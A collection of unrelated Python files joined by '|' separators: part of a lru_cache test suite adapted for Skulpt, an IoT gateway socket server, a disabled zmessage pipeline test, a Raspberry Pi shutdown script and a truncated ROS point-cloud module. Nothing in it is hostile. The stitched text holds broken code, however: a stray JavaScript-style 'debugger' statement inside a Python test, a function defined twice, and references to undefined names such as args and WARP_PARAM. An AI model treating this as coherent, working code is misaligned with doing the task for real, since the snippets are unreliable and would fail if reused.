self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_no_args(self):
@self.module.lru_cache
def square(x):
return x ** 2
self.assertEqual(list(map(square, [10, 20, 10])),
[100, 400, 100])
self.assertEqual(square.cache_info().hits, 1)
self.assertEqual(square.cache_info().misses, 2)
self.assertEqual(square.cache_info().maxsize, 128)
self.assertEqual(square.cache_info().currsize, 2)
def test_lru_bug_35780(self):
# C version of the lru_cache was not checking to see if
# the user function call has already modified the cache
# (this arises in recursive calls and in multi-threading).
# This cause the cache to have orphan links not referenced
# by the cache dictionary.
global once
once = True # Modified by f(x) below
@self.module.lru_cache(maxsize=10)
def f(x):
global once
rv = f'.{x}.'
if x == 20 and once:
once = False
rv = f(x)
return rv
# Fill the cache
for x in range(15):
self.assertEqual(f(x), f'.{x}.')
self.assertEqual(f.cache_info().currsize, 10)
# Make a recursive call and make sure the cache remains full
self.assertEqual(f(20), '.20.')
self.assertEqual(f.cache_info().currsize, 10)
def test_lru_bug_36650(self):
# C version of lru_cache was treating a call with an empty **kwargs
# dictionary as being distinct from a call with no keywords at all.
# This did not result in an incorrect answer, but it did trigger
# an unexpected cache miss.
@self.module.lru_cache()
def f(x):
pass
f(0)
f(0, **{})
self.assertEqual(f.cache_info().hits, 1)
@ignore_skulpt
def test_lru_hash_only_once(self):
# To protect against weird reentrancy bugs and to improve
# efficiency when faced with slow __hash__ methods, the
# LRU cache guarantees that it will only call __hash__
# only once per use as an argument to the cached function.
@self.module.lru_cache(maxsize=1)
def f(x, y):
return x * 3 + y
# Simulate the integer 5
mock_int = unittest.mock.Mock()
mock_int.__mul__ = unittest.mock.Mock(return_value=15)
mock_int.__hash__ = unittest.mock.Mock(return_value=999)
# Add to cache: One use as an argument gives one call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 1)
self.assertEqual(f.cache_info(), (0, 1, 1, 1))
# Cache hit: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 1, 1, 1))
# Cache eviction: No use as an argument gives no additional call
self.assertEqual(f(6, 2), 20)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 2, 1, 1))
# Cache miss: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 3)
self.assertEqual(f.cache_info(), (1, 3, 1, 1))
def test_lru_reentrancy_with_len(self):
# Test to make sure the LRU cache code isn't thrown-off by
# caching the built-in len() function. Since len() can be
# cached, we shouldn't use it inside the lru code itself.
global len
old_len = len
try:
len = self.module.lru_cache(4)(len)
for i in [0, 0, 1, 2, 3, 3, 4, 5, 6, 1, 7, 2, 1]:
self.assertEqual(len('abcdefghijklmn'[:i]), i)
finally:
len = old_len
def test_lru_star_arg_handling(self):
# Test regression that arose in ea064ff3c10f
@functools.lru_cache()
def f(*args):
return args
self.assertEqual(f(1, 2), (1, 2))
self.assertEqual(f((1, 2)), ((1, 2),))
def test_lru_type_error(self):
# Regression test for issue #28653.
# lru_cache was leaking when one of the arguments
# wasn't cacheable.
@functools.lru_cache(maxsize=None)
def infinite_cache(o):
pass
@functools.lru_cache(maxsize=10)
def limited_cache(o):
pass
with self.assertRaises(TypeError):
infinite_cache([])
with self.assertRaises(TypeError):
limited_cache([])
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
return n
for i in (0, 1):
self.assertEqual([eq(n) for n in range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=0, currsize=0))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get passed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
for maxsize in (None, 128):
@self.module.lru_cache(maxsize)
def func(i):
return 'abc'[i]
self.assertEqual(func(0), 'a')
with self.assertRaises(IndexError) as cm:
func(15)
# self.assertIsNone(cm.exception.__context__)
# Verify that the previous exception did not result in a cached entry
with self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
for maxsize in (None, 128):
@self.module.lru_cache(maxsize=maxsize, typed=True)
def square(x):
return x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
self.assertEqual(square.cache_info().misses, 4)
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_kwargs_order(self):
# PEP 468: Preserving Keyword Argument Order
@self.module.lru_cache(maxsize=10)
def f(**kwargs):
return list(kwargs.items())
self.assertEqual(f(a=1, b=2), [('a', 1), ('b', 2)])
self.assertEqual(f(b=2, a=1), [('b', 2), ('a', 1)])
self.assertEqual(f.cache_info(),
self.module._CacheInfo(hits=0, misses=2, maxsize=10, currsize=2))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
return 42
g = self.module.lru_cache()(f)
for attr in self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
@ignore_skulpt
def test_lru_cache_threaded(self):
n, m = 5, 11
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
for _ in range(m):
self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
for _ in range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
support.setswitchinterval(1e-6)
try:
# create n threads in order to fill cache
threads = [threading.Thread(target=full, args=[k])
for k in range(n)]
with threading_helper.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
if self.module is py_functools:
# XXX: Why can be not equal?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
else:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads in order to fill cache and 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
for k in range(n)]
start.clear()
with threading_helper.start_threads(threads):
start.set()
finally:
sys.setswitchinterval(orig_si)
@ignore_skulpt
def test_lru_cache_threaded2(self):
# Simultaneous call with the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
return 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
for i in range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) for k in range(n)]
with threading_helper.start_threads(threads):
for i in range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
@ignore_skulpt
def test_lru_cache_threaded3(self):
@self.module.lru_cache(maxsize=2)
def f(x):
time.sleep(.01)
return 3 * x
def test(i, x):
with self.subTest(thread=i):
self.assertEqual(f(x), 3 * x, i)
threads = [threading.Thread(target=test, args=(i, v))
for i, v in enumerate([1, 2, 2, 3, 2])]
with threading_helper.start_threads(threads):
pass
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
return x
class DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
return self.x
def __eq__(self, other):
if self.x == 2:
test_func(DoubleEq(1))
return self.x == other.x
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct return value
def test_lru_method(self):
debugger
global _self
_self = self
class X(int):
f_cnt = 0
@_self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
return x*10+self
a = X(5)
b = X(5)
c = X(7)
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
@ignore_skulpt
def test_pickle(self):
cls = self.__class__
for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto, func=f):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertIs(f_copy, f)
def test_copy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
# with self.subTest(func=f):
f_copy = copy.copy(f)
self.assertIs(f_copy, f)
def test_deepcopy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
# with self.subTest(func=f):
f_copy = copy.deepcopy(f)
self.assertIs(f_copy, f)
def test_lru_cache_parameters(self):
@self.module.lru_cache(maxsize=2)
def f():
return 1
self.assertEqual(f.cache_parameters(), {'maxsize': 2, "typed": False})
@self.module.lru_cache(maxsize=1000, typed=True)
def f():
return 1
self.assertEqual(f.cache_parameters(), {'maxsize': 1000, "typed": True})
@ignore_skulpt
def test_lru_cache_weakrefable(self):
@self.module.lru_cache
def test_function(x):
return x
class A:
@self.module.lru_cache
def test_method(self, x):
return (self, x)
@staticmethod
@self.module.lru_cache
def test_staticmethod(x):
return (self, x)
refs = [weakref.ref(test_function),
weakref.ref(A.test_method),
weakref.ref(A.test_staticmethod)]
for ref in refs:
self.assertIsNotNone(ref())
del A
del test_function
gc.collect()
for ref in refs:
self.assertIsNone(ref())
# @py_functools.lru_cache()
# def py_cached_func(x, y):
# return 3 * x + y
@c_functools.lru_cache()
def c_cached_func(x, y):
return 3 * x + y
# class TestLRUPy(TestLRU, unittest.TestCase):
# module = py_functools
# cached_func = py_cached_func,
# @module.lru_cache()
# def cached_meth(self, x, y):
# return 3 * x + y
# @staticmethod
# @module.lru_cache()
# def cached_staticmeth(x, y):
# return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
cached_func = c_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
if __name__ == '__main__':
unittest.main(verbosity=1)
|
server.py
|
#!/usr/bin/env python3
import sys
import socket
import selectors
import traceback
from tools import registerDeviceOnIotHub,startClient
from config import GatewayConfig
import multiprocessing
def serverStarter(COORDINATOR_NAME):
print("starting client")
startClient(COORDINATOR_NAME)
print("Client Started")
COORDINATOR_PORT = GatewayConfig[COORDINATOR_NAME]
print("Started Coordinator device "+COORDINATOR_NAME + " listening at port " , COORDINATOR_PORT)
s = socket.socket()
print(COORDINATOR_PORT)
s.bind(('127.0.0.1', COORDINATOR_PORT))
s.listen(5)
while True:
c, addr = s.accept()
deviceId = c.recv(1024).decode()
if deviceId:
print("deviceid received ", deviceId)
registerDeviceOnIotHub(deviceId, COORDINATOR_NAME)
c.close()
if __name__ == '__main__':
for gateway in GatewayConfig.keys():
p = multiprocessing.Process(target=serverStarter,args = (gateway,))
p.start()
|
multiple_pipelines_test.py
|
# -*- coding: utf-8 -*-
#
# ventilatorA-------------+
# | |
# +--------+-------+ |
# | | | |
# workerA workerA workerA ... |
# | | | |
# +--------+-------+ |
# | |
# sinkA-----------------+
# &
# ventilatorB-------------+
# | |
# +--------+-------+ |
# | | | |
# workerB workerB workerB ... |
# | | | |
# +--------+-------+ |
# | |
# sinkB-----------------+
#
import os
import time
import random
import signal
import logging
import shutil
import tempfile
import threading
import unittest
from collections import OrderedDict
from multiprocessing import cpu_count, Process
from zmessage.pipeline import Sink, Ventilator, VentilatorToWorkerMessage, Worker, WorkerToSinkMessage
from .testlogging import setup_logging, update_formatter
try:
from typing import Any, Iterator, Optional, Tuple, Type, TypeVar
VentilatorWorkerMessageType = TypeVar('VentilatorWorkerMessageType', bound='VentilatorToWorkerMessage')
WorkerSinkMessageType = TypeVar('WorkerSinkMessageType', bound='WorkerToSinkMessage')
except ImportError:
pass
workersA = OrderedDict()
workersB = OrderedDict()
savb_process = None
NUM_WORKERS = max(2, min(4, cpu_count() - 1))
NUM_JOBS = 10000
class TestVentilatorToWorkerMessage(VentilatorToWorkerMessage):
types = ('sleep',)
required_data = ('sleep',)
def is_valid_sleep(self): # type: () -> Tuple[bool, str]
"""
>>> TestVentilatorToWorkerMessage('foo', foo='bar').is_valid()
(False, "Value of 'type' must be one of sleep.")
>>> TestVentilatorToWorkerMessage('sleep', foo='bar').is_valid()
(False, "Required data 'sleep' is unset in message.")
>>> TestVentilatorToWorkerMessage('sleep', sleep='bar').is_valid()
(False, "'sleep' must be a float.")
>>> TestVentilatorToWorkerMessage('sleep', sleep=2).is_valid()
(True, '')
"""
try:
float(self.get('sleep')) # type: ignore # noqa
except (TypeError, ValueError):
return False, "'sleep' must be a float."
return True, ''
class TestWorkerToSinkMessage(WorkerToSinkMessage):
types = ('job done',)
required_data = ('ventilator_request_id', 'slept')
class TestVentilator(Ventilator):
def __init__(self, jobs_in_addr, job_id_sink_addr): # type: (str, str) -> None
super(TestVentilator, self).__init__(jobs_in_addr, job_id_sink_addr)
self.jobs_sent = 0
def requests(self): # type: () -> Iterator[VentilatorWorkerMessageType]
while self.jobs_sent < NUM_JOBS:
yield TestVentilatorToWorkerMessage('sleep', sleep=random.random() / 500.0)
self.jobs_sent += 1
class TestWorker(Worker):
VentilatorWorkerMessageCls = TestWorkerToSinkMessage
def __init__(self, jobs_in_addr, worker_control_addr, results_out_addr): # type: (str, str, str) -> None
super(TestWorker, self).__init__(jobs_in_addr, worker_control_addr, results_out_addr)
self.time_waited = 0.0
def do_work(self, request): # type: (VentilatorWorkerMessageType) -> WorkerSinkMessageType
time.sleep(request['sleep'])
self.time_waited += request['sleep']
slept = request.get('slept') or {}
slept[self.name] = self.time_waited
return TestWorkerToSinkMessage(mtype='job done', ventilator_request_id=request.id, slept=slept)
def start(self, install_sig_handler=True, *args, **kwargs): # type: (Optional[bool], *Any, **Any) -> Any
# update PID in logger
pid = os.getpid()
if self.pid != pid:
self.pid = pid
update_formatter(logging.getLogger('zmessage'), os.getpid())
super(TestWorker, self).start(install_sig_handler, *args, **kwargs)
class TestSinkB(Sink):
_printed = 0.0
_log_interval = 10.0
def __init__(self, *args, **kwargs):
super(TestSinkB, self).__init__(*args, **kwargs)
self.workers_slept = {}
def handle_result(self, request): # type: (WorkerSinkMessageType) -> None
for k, v in request['slept'].items():
if v > self.workers_slept.get(k, 0.0):
self.workers_slept[k] = v
self.print_open_requests()
def print_open_requests(self):
now = time.time()
if self._printed + self._log_interval < now:
self._printed = now
self.logger.info(
'[%s] Waiting for %d unfinished requests (and %d unknown)...',
self.name,
len(self.unfinished_request_ids), len(self.unknown_ventilator_request_ids)
)
def run(self, *args, **kwargs): # type: (*Any, **Any) -> Any
self._printed = time.time()
super(TestSinkB, self).run(*args, **kwargs)
class TestSinkAVentilatorB(TestSinkB):
def __init__(self, ventilator, *args, **kwargs): # type: (TestVentilator, *Any, **Any) -> None
super(TestSinkAVentilatorB, self).__init__(*args, **kwargs)
self.ventilator = ventilator
def init(self, install_sig_handler=True): # type: (Optional[bool]) -> None
super(TestSinkAVentilatorB, self).init(install_sig_handler)
self.ventilator.context = self.context
self.ventilator.init(install_sig_handler)
def cleanup(self): # type: () -> None
self.ventilator.cleanup()
super(TestSinkAVentilatorB, self).cleanup()
def handle_result(self, request): # type: (WorkerSinkMessageType) -> None
for k, v in request['slept'].items():
if v > self.workers_slept.get(k, 0.0):
self.workers_slept[k] = v
self.print_open_requests()
self.ventilator.send_job(
TestVentilatorToWorkerMessage('sleep', sleep=random.random() / 500.0, slept=self.workers_slept)
)
def run(self, *args, **kwargs): # type: (*Any, **Any) -> Any
super(TestSinkAVentilatorB, self).run(*args, **kwargs)
self.ventilator.logger.debug('[%s] Ventilator finished sending requests: %r.',
self.ventilator.name, self.ventilator.request_count)
self.ventilator.logger.debug('[%s] Telling sink B we have finished sending.', self.name)
self.ventilator.send_finished()
def start(self, install_sig_handler=True, *args, **kwargs): # type: (Optional[bool], *Any, **Any) -> Any
# update PID in logger
pid = os.getpid()
if self.pid != pid:
self.pid = pid
update_formatter(logging.getLogger('zmessage'), os.getpid())
super(TestSinkAVentilatorB, self).start(install_sig_handler, *args, **kwargs)
def kill_processesA(signum, frame): # type: (int, Any) -> None
for p in workersA.values():
try:
os.kill(p.pid, signal.SIGINT)
except OSError as exc:
import errno
# ignore "no such process" as it might have been joined already
if exc.errno != errno.ESRCH:
raise
def kill_processesB(signum, frame): # type: (int, Any) -> None
for p in workersB.values():
try:
os.kill(p.pid, signal.SIGINT)
except OSError as exc:
import errno
# ignore "no such process" as it might have been joined already
if exc.errno != errno.ESRCH:
raise
def kill_savb(signum, frame): # type: (int, Any) -> None
try:
os.kill(savb_process.pid, signal.SIGINT)
except OSError as exc:
import errno
# ignore "no such process" as it might have been joined already
if exc.errno != errno.ESRCH:
raise
class TestMultiplePipeline(unittest.TestCase):
def setUp(self):
self.skipTest('disabled')
self.socket_dir = tempfile.mkdtemp()
self.jobs_for_workersA_addr = 'ipc://{}'.format(os.path.join(self.socket_dir, 'jobs_for_workersA.socket'))
self.job_ids_for_sinkA_addr = 'ipc://{}'.format(os.path.join(self.socket_dir, 'job_ids_for_sinkA_addr.socket'))
self.workersA_results_addr = 'ipc://{}'.format(os.path.join(self.socket_dir, 'workersA_results_addr.socket'))
self.workersA_control_addr = 'ipc://{}'.format(os.path.join(self.socket_dir, 'workersA_control.socket'))
self.jobs_for_workersB_addr = 'ipc://{}'.format(os.path.join(self.socket_dir, 'jobs_for_workersB.socket'))
self.job_ids_for_sinkB_addr = 'ipc://{}'.format(os.path.join(self.socket_dir, 'job_ids_for_sinkB_addr.socket'))
self.workersB_results_addr = 'ipc://{}'.format(os.path.join(self.socket_dir, 'workersB_results_addr.socket'))
self.workersB_control_addr = 'ipc://{}'.format(os.path.join(self.socket_dir, 'workersB_control.socket'))
def tearDown(self):
shutil.rmtree(self.socket_dir)
def runTest(self):
global savb_process
logger = setup_logging('zmessage', logging.DEBUG, os.getpid())
# start workers in separate processes
for char, processes in (('A', workersA), ('B', workersB)):
for num in range(NUM_WORKERS):
worker = TestWorker(
getattr(self, 'jobs_for_workers{}_addr'.format(char)),
getattr(self, 'workers{}_control_addr'.format(char)),
getattr(self, 'workers{}_results_addr'.format(char))
)
worker.name = 'Worker {} {}'.format(char, num + 1)
p = Process(target=worker.start, name=worker.name)
p.start()
processes[worker] = p
logger.info('Started worker %s %d/%d (PID %d, name %r).',
char, num + 1, NUM_WORKERS, p.pid, worker.name)
t0 = time.time()
# start ventilator A in thread of main process
ventilator_a = TestVentilator(self.jobs_for_workersA_addr, self.job_ids_for_sinkA_addr)
ventilator_a.name = 'Ventilator A'
ventilator_thread = threading.Thread(target=ventilator_a.start)
ventilator_thread.start()
logger.info('Started ventilator A (in thread).')
# start ventilator B + sink A in separate process
ventilator_b = TestVentilator(self.jobs_for_workersB_addr, self.job_ids_for_sinkB_addr)
ventilator_b.name = 'Ventilator B'
sink_a_vent_b = TestSinkAVentilatorB(
ventilator_b,
self.workersA_results_addr,
self.workersA_control_addr,
self.job_ids_for_sinkA_addr
)
sink_a_vent_b.name = 'Sink A'
savb_process = Process(target=sink_a_vent_b.start, name=sink_a_vent_b.name)
savb_process.start()
logger.info('Started SinkA/VentB process (PID %d, name %r).', savb_process.pid, savb_process.name)
# start sink B (blocking in main process)
sink_b = TestSinkB(self.workersB_results_addr, self.workersB_control_addr, self.job_ids_for_sinkB_addr)
sink_b.name = 'Sink B'
sink_b.start()
logger.info('Sink B finished.')
t1 = time.time()
# shutdown
ventilator_thread.join()
previous_handler = None
try:
# stop sinkA+ventB, if it didn't already
previous_handler = signal.signal(signal.SIGALRM, kill_savb)
signal.alarm(1)
savb_process.join()
logger.info('SinkA / VentB with PID %d and name %r ended.', savb_process.pid, savb_process.name)
# stop workers, if they didn't already
for char, process_list, kill_func in (
('A', workersA.values(), kill_processesA),
('B', workersB.values(), kill_processesB)
):
signal.signal(signal.SIGALRM, kill_func)
for count, process in enumerate(process_list):
signal.alarm(1)
process.join()
logger.info('Worker %d/%d with PID %d and name %r ended.',
count + 1, len(process_list), process.pid, process.name)
except KeyboardInterrupt:
logger.warn('KeyboardInterrupt: Sending SIGINT to all workers...')
for p in workersA.values():
os.kill(p.pid, signal.SIGINT)
p.join()
for p in workersB.values():
os.kill(p.pid, signal.SIGINT)
p.join()
if previous_handler:
signal.signal(signal.SIGALRM, previous_handler)
logger.info('The End.')
logger.info('')
for name in sorted(sink_b.workers_slept.keys()):
logger.info('%s slept %0.2f sec.', name, sink_b.workers_slept[name])
logger.info('-' * 26)
logger.info('%d workers slept : %0.2f', len(workersA) + len(workersB), sum(sink_b.workers_slept.values()))
logger.info('Wall time elapsed: %0.2f', t1 - t0)
self.assertEqual(len(sink_b.unfinished_request_ids), 0, 'Not all requests reached the sink.')
self.assertEqual(len(sink_b.unknown_ventilator_request_ids), 0, 'The sink received unknown requests.')
self.assertLess(t1 - t0, sum(sink_b.workers_slept.values()), "Workers didn't sleep in parallel.")
if __name__ == '__main__':
import doctest
doctest.testmod()
unittest.main(verbosity=2)
|
pi_master.py
|
"""Simulate the shutdown sequence on the master pi."""
import socket
import threading
import time
from pathlib import Path
def talk_to_train():
with socket.socket() as sock:
# TODO: replace localhost with static ip of train pi
# port number has to match the socket.bind() of the other program.
#sock.connect(('localhost', 31337))
sock.connect(('192.168.1.92', 31337)) #34 home changes at GP's
print('made connection to train pi, asked for shutdown')
# Wait until the train pi has signaled its shutdown is complete. We
# don't actually need to receive any data. This call blocks until the
# connection is gracefully closed by the train pi, or broken due to a
# network error. In either case, we assume it has shut down.
sock.recv(1024)
print('shutdown acknowledged')
if __name__ == '__main__':
# when shutdown is pressed create a background thread that will create a socket to
# connect to the train pi
# main thread goes through shutdown sequence
# background thread waits for signal that train pi has shut down
# when both threads have completed, gracefully exit
input('Press enter to begin shutdown...')
bg = threading.Thread(target=talk_to_train)
bg.start()
# Simulate the work of shutting down master pi programs.
Path('/home/pi/Documents/stop/shutdown/Vegas_train_shutdown').touch()
for i in range(10, 0, -1):
print(i)
time.sleep(1)
print('master pi shutdown, waiting for train pi')
bg.join()
print('shutdown complete')
#Path('/home/pi/Documents/stop/shutdown/Vegas_train_shutdown').touch()
|
pc2obs.py
|
# ECSC on the opencv image to quit
import numpy as np
import cv2
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import math
import time
import sys
import rospy
import sensor_msgs.point_cloud2 as pc2
from sensor_msgs.msg import PointCloud2, CompressedImage, PointField
from nav_msgs.msg import Odometry
from std_msgs.msg import String, Header
from cv_bridge import CvBridge, CvBridgeError
import threading
from time import sleep
import csv
global depth_scale, ROW, COL
global currentStatus
rospy.init_node('pc2obs', anonymous=False)
#size of images
COL= 480
ROW = 640
#ROBOT MOVE
SPEED = 15
ROTATE_SPEED = 25
currentStatus = ""
font = cv2.FONT_HERSHEY_SCRIPT_SIMPLEX
fontScale = 1.5
yellow = (0, 255, 255)
handle_easy = True
points_raw = 0
color_image_raw = 0
cmd_vel = 0
robot_state = 0
t = time.time()
def euler_from_quaternion(x,y,z,w):
t3 = 2.0*(w*z+x*y)
t4 = 1.0-2.0*(y*y+z*z)
yaw_z = math.atan2(t3,t4)
return yaw_z
#Topview image. src, dst are numpy array.
#########################Move LAVACON TO EACH EDGES AND TRY AGAIN!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
def Topview(src):
global WARP_PARAM, ROW, COL
# col=720, row=1280
col, row = src.shape[0], src.shape[1]
corners = np.float32([[row*WARP_PARAM/2, 0], [row*(1-WARP_PARAM/2), 0], [0, col], [row, col]])
warp_corners = np.float32([[0, 0], [ROW, 0], [0, COL], [ROW, COL]])
trans_matrix = cv2.getPerspectiveTransform(corners, warp_corners)
dst = cv2.warpPerspective(src, trans_matrix, (ROW, COL))
return dst
def preGroundSeg(depth_image, color_image):
global ROW, COL, GRN_ROI
# FIXME: don't do ZOOM_PARAM in GAZEBO
# ROI image
depth_image = depth_image[GRN_ROI:COL, 0:ROW]
color_image = color_image[GRN_ROI:COL, 0:ROW]
# Topview image
depth_image2 = Topview(depth_image)
color_image2 = Topview(color_image)
return depth_image2, color_image2
def GroundSeg(depth_image, color_image, stride=80):
global ROW
virtual_lane_available = []
for i in range(stride, ROW, stride):
if args.plot and i == ROW/2:
temp_image, dead_end = verticalGround(depth_image, color_image, i, plot=True)
else:
temp_image, dead_end = verticalGround(depth_image, color_image, i, plot=False)
virtual_lane_available.append(dead_end)
return temp_image, virtual_lane_available
def points_callback(data):
global points_raw
points_raw = data
from rosgraph_msgs.msg import Clock
sim_time =0.0
def time_callback(data):
global sim_time
_sec = data.clock.secs
_nsec = data.clock.nsecs
sim_time = _sec + _nsec * 0.000000001
def image_callback(data):
global color_image_raw
color_image_raw = bridge.compressed_imgmsg_to_cv2(data, "bgr8")
def cmd_callback(data):
global cmd_vel
cmd_vel = data
def state_callback(data):
global robot_state
q = data.pose.pose.orientation
yaw = euler_from_quaternion(q.x, q.y, q.z, q.w)
yaw = yaw-math.pi/2 if yaw-math.pi/2 < math.pi else yaw+3*math.pi/2
robot_state = [data.pose.pose.position.x, data.pose.pose.position.y, -yaw]
from rosgraph_msgs.msg import Clock
sim_time = 0.0
def time_callback(data):
global sim_time
_sec = data.clock.secs
_nsec = data.clock.nsecs
sim_time = _sec + _nsec * 0.000000001
def listener():
rospy.Subscriber("/camera/depth/points", PointCloud2, points_callback)
#rospy.Subscriber("/camera/color/image_raw/compressed", CompressedImage, image_callback)
# rospy.Subscriber("/gazebo/model_states", ModelStates, state_callback)
rospy.Subscriber("/odom", Odometry, state_callback)
rospy.Subscriber("/clock", Clock, time_callback)
# spin() simply keeps python from exiting until this node is stopped
rospy.spin()
direc = 0
def pc2obs_init():
# Configure depth and color streams
global bridge, pub
bridge = CvBridge()
realsense_listener = threading.Thread(target=listener)
realsense_listener.start()
pub = rospy.Publisher("obs_center", PointCloud2, queue_size=1)
fields = [PointField('x',0,PointField.FLOAT32,1),
PointField('y',4,PointField.FLOAT32,1),
PointField('z',8,PointField.FLOAT32,1)]
header = Header()
header.frame_id = "map"
def pc2obs(voxel_size = 0.3, plot=False, ros=True):
global points_raw, color_image_raw, robot_state, bridge, currentStatus, handle_easy, pub, sim_time
#print(points_raw)
# if type(points_raw) == type(0) or type(color_image_raw) == type(0):
if type(points_raw) == type(0) or sim_time == 0.0:
print("NOT CONNECTED")
sleep(0.1)
return False, False, False
t1 = time.time()
points = pc2.read_points(points_raw, skip_nans=True, field_names=("x", "y", "z"))
points = np.array(list(points), dtype=np.float32)
